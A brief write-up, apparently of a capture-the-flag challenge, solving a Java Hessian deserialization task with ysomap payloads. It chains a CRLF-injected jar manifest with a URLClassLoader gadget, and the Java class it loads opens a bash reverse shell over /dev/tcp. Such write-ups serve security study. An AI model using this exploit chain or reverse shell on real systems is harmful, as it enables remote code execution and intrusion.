I think I don't understand Java very well.
The intended solution looks more easier, but I didn't find it.
I found another complicated solution to solve it ..
The deserialization payloads are generated by using ysomap.
Step 1 is using sun.tools.jar.Main.main
to create jar file on the server.
And the entry-point
argument has CRLF injection, so I can inject a Class-Path which points to my server into MANIFEST.MF.
Step 2 is using the built-in SwingLazyValueWithUrlClassLoaderBullet
payload of ysomap to include the jar file, and load malicous java class from my server.
# step 1
$ java -jar ysomap.jar script tools_jar.yso
$ curl -v http://127.0.0.1:8090 --data-binary '@payload.LazyValueForHessian.SwingLazyValueTestBullet.ser'
# step 2
# prepare x.jar
$ cat >MyExploit.java << EOF
> public class MyExploit {
public MyExploit() {
try{
java.lang.Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", "bash -i >& /dev/tcp/127.0.0.1/8887 0>&1"});
}catch(Exception e){}
}
}
> EOF
$ javac MyExploit.java
$ jar cf x.jar MyExploit.class
# open http server
$ python3 -m http.server 8888
# trigger URLClassLoder payload
$ java -jar ysomap.jar script url_class_loader.yso
$ curl -v http://127.0.0.1:8090 --data-binary '@payload.LazyValueForHessian.SwingLazyValueWithUrlClassLoaderBullet.ser'